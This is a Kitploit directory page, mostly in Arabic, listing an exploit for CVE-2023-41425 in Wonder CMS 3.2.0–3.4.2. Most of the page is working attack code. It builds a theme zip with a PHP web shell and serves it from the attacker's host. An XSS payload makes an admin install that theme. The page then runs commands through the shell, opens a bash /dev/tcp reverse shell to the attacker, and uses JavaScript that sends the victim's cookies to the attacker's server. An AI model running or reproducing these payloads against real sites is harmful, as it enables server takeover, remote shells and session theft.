Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-41425 — ثغرة استغلال من XSS إلى RCE لنظام Wonder CMS 3.2.0–3.4.2 مع حقن تلقائي للقوالب، ونشر شيل ويب PHP، وشيل عكسي، وسرقة الكوكيز عبر حمولات JavaScript مصممة خصيصًا. | Kitploit
أدوات/GitHubGitHub/raffli-dev/cve-2023-41425
أدوات التصيدتوليد الحمولةالاستغلالاستغلال تطبيقات الويبأداة الوصول عن بعد
GitHubraffli-dev/cve-2023-41425

CVE-2023-41425

ثغرة استغلال من XSS إلى RCE لنظام Wonder CMS 3.2.0–3.4.2 مع حقن تلقائي للقوالب، ونشر شيل ويب PHP، وشيل عكسي، وسرقة الكوكيز عبر حمولات JavaScript مصممة خصيصًا.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

https://sploitus.com/exploit?id=3A833277-4844-5F02-AFEF-5EA6BA8AC1AC

############## ثغرة RCE في Wonder CMS ##############

| | الوصف : من XSS إلى RCE، Wonder CMS 3.2.0 <= 3.4.2 | المصادر | - https://github.com/prodigiousMind/CVE-2023-41425/tree/main | - https://nvd.nist.gov/vuln/detail/CVE-2023-41425 |


RCE


.. code-block:: bash

Setting vars

$RHOST="http://host.com:80"
$LHOST="10.10.14.152"
$LPORT="4444"
$LPORTWEB="80"

Moving to a tmp dir

cd $(mktemp -d)

Creating our evil theme zip file

root@kitploit:~
mkdir -p evil
cat <<'EOF'>evil/evil.php
<?=`$_GET[0]`;?>
EOF
root@kitploit:~
zip -r evil.zip evil/

JS payload that will install the new theme

root@kitploit:~
cat <<EOF>xssrce.js
var xhr=new XMLHttpRequest();
xhr.open("GET", "${RHOST}/?installModule=http://${LHOST}:${LPORTWEB}/evil.zip&directoryName=whatever&type=themes&token=" + document.querySelectorAll('[name="token"]')[0].value, true);
xhr.send();
EOF

Print XSS url

root@kitploit:~
echo -e "\n# XSS RCE"
cat <<EOF
${RHOST}/index.php?page=loginURL?"></form><script+src="http://${LHOST}:${LPORTWEB}/xssrce.js"></script><form+action="
EOF

Starting a new web server to serve payloads

root@kitploit:~
sudo python3 -m http.server $LPORTWEB &

|

| بعد إرسال XSS الخاص بـ RCE إلى المسؤول، نحصل على استدعاءات http التالية

.. code-block::

10.129.252.14 - - [11/Aug/2024 18:42:26] "GET /xssrce.js HTTP/1.1" 304 - 10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 - 10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 - 10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 - 10.129.252.14 - - [11/Aug/2024 18:42:32] "GET /evil.zip HTTP/1.1" 200 -

|

| يمكننا الآن استخدام حمولة php

.. code-block:: bash

id

CMD="id"

root@kitploit:~
curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Reverse shell, (don't forget to listen first: nc -nvlp 4444)

CMD="bash -c 'bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1'"

curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"

|


الكوكيز


| يمكنك أيضًا سرقة الكوكيز (وبالتالي جلسة PHP)

.. code-block:: bash

cat <xsscookie.js var xhr=new XMLHttpRequest(); xhr.open("GET", "http://${LHOST}:${LPORTWEB}/?"+document.cookie, true); xhr.send(); EOF

echo -e "\n# XSS Retrieve PHP session" cat <<EOF ${RHOST}/index.php?page=loginURL?"><script+src="http://${LHOST}:${LPORTWEB}/xsscookie.js"><form+action=" EOF

|

تنزيل الأداة